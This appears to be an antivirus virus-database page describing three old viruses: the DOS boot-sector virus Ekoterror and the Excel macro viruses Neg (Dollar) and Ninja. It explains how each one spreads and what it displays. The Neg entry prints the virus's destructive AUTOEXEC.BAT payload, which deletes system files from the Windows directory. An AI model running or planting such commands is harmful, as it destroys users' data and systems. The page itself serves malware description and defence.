Virus Database

Ekoterror

Description Ekoterror

It's a memory resident dangerous multipartite stealth virus. On execution of infected file it writes itself into MBR of hard drive (it occupies the sectors from 0/0/1 till 0/0/5 - track/head/sector) and returns the control to the host program. On loading from infected sector it hooks INT 8, 13h, then by using INT 8 it hooks INT 21h and writes itself at the beginning of the .COM-files on their creating.
Sometimes it decrypts and types:
EkoTerror (C) 1991 ATK-toimisto P.Linkola Oy
Kovalevysi on poistettu käytöstä luonnonsuojelun nimessä.
Vihreässä yhteiskunnassa ei saa olla ydinsähköllä toimivia kovalevyjä.

and then hangs up the computer. It infects incorrectly some types of hard drives, DOS hangs up on loading in these cases.

Check other viruses! Be aware! Use Antiviral Software

Macro.Excel.Neg

Description Macro.Excel.Neg

This virus infects Excel sheets. It contains six functions in one module Dollar: Auto_Open, Fuck, Auto_Close, cek_global, infectglobal, and inFuckIt.
While loading an infected document, Excel executes auto macros auto_open, and the virus takes control. The virus auto_open macro contains a command that defines the F*ck macro as a handler of the OnSheetActivate routine. As a result, the virus hooks the sheet activate routine, and while opening a sheet, the virus takes control.
When the auto_open macro takes control, it searches for DOLLAR.XLM files in the Excel Startup directory. If the infected macro is an active Workbook and the DOLLAR.XLM file does not exist in the Excel Startup directory when the virus is executed for the first time, the virus creates this file and saves its code to it by using the SaveAs command. When Excel loads its modules the next time it automatically loads all XLS files from the Startup directory. The infected DOLLAR.XLM is loaded along with other files, and the virus takes control and hooks the sheet activation routine. Upon activation of a sheet, the virus copies its code to the active Workbook and as a result, spreads its code to this sheet.
The virus deletes 25 menu items related to macro viewing/editing/etc, if they exist. On the 13th of any month, it appends to the C:AUTOEXEC.BAT file commands that erase Windows files:
@ECHO OFF
CLS
cdwindows
del *.com >nul
del *.vxd >nul
del *.drv >nul
del *.dll >nul

The virus contains the comments:
------------------------------------------------
Generated with NEG !!. Please include this text
------------------------------------------------
NEG is Trademark of NoMercy
Date generated : 27- 3- 1998
VirusName: Dollar
Author: NEG
Module Name: Dollar
Template: DOLLAR.XLM

Macro.Excel.Ninja

Description Macro.Excel.Ninja

This virus infects Excel spread sheets (XLS files). It contains one module, "Ninja," that has two functions: "auto_open" and "Infect_Ninja".
The virus "auto_open" macro contains just one command that defines the "Infect_Ninja" macro as a handler of the OnSheetActivate routine. As a result, the virus hooks sheets activation, and, while opening a sheet, the virus (the Infect_Ninja macro) takes control.
When the Infect_Ninja macro takes control, it searches for NINJA.XLS files in the Excel Startup directory and checks the count of modules in the current Workbook.
If the infected macro is an active Workbook and the NINJA.XLS file does not exist in the Excel Startup directory, the virus decides that it is being executed for the first time. The virus then creates the NINJA.XLS file in the Excel Startup directory and saves its code to it by using the "Save As" command.
When Excel loads its modules the next time, it automatically loads all XLS files from the Startup directory. The infected NINJA.XLS is loaded as well as other files, and the virus takes control and hooks the sheet activation routine.
If the NINJA.XLS file exists in the Excel directory, the virus copies its code to the active Workbook. As a result, the active Workbook is infected.

Home